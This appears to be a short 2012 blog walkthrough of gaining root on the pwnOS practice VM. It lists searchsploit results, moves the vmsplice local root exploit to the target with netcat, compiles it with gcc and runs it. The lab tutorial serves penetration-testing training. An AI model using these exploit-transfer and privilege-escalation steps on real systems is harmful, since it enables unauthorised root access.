Comments

Pages

Friday, 14 September 2012

Gaining Access PwnOS

Posted by at 17:29 Read our previous post
previously we have discussed about Privillege Escalation
Now we will learn how to Gaining access on pwnOS.

  1. Check the kernel version of pwnOS
    vmware@ubuntuvm$ uname -a
  2. Search the exploit for Linux Kernel 2.6.22 on exploit db
    cd /pentest/exploits/exploitdb/
    ./searchsploit kernel linux
    Linux Kernel <=2.6.21.1 IPv6 Jumbo Bug Remote DoS Exploit                   /linux/dos/4893.c
    Cisco VPN Client IPSec Driver Local kernel system pool Corruption PoC       /windows/dos/4911.c
    Safenet IPSecDrv.sys <= 10.4.0.12 Local kernel ring0 SYSTEM Exploit         /windows/local/5004.c
    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit                  /linux/local/5092.c
    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit                  /linux/local/5092.c
    Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit                  /linux/local/5092.c
    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit                    /linux/local/5093.c
    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit                    /linux/local/5093.c
    Linux Kernel 2.6.23 - 2.6.24 vmsplice Local Root Exploit                    /linux/local/5093.c
    DESlock+ <= 3.2.6 (list) Local Kernel Memory Leak PoC                       /windows/local/5141.c
  3. Send the exploit into pwnOS using netcat
    root@bt# nc 192.168.56.101 1011 < /pentest/exploits/exploitdb/platform/linux/local/5092.c
  4. Run netcat on pwnOS to get the exploit
    vmware@ubuntuvm$ nc -l -p 1011 > 5092.c
  5. Compile the exploit using GCC
    vmware@ubuntuvm$ gcc 5092.c -o exploit
  6. run the exploit! run this command to check the access level
    vmware@ubuntuvm$ ./epxloit
    whoami

No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template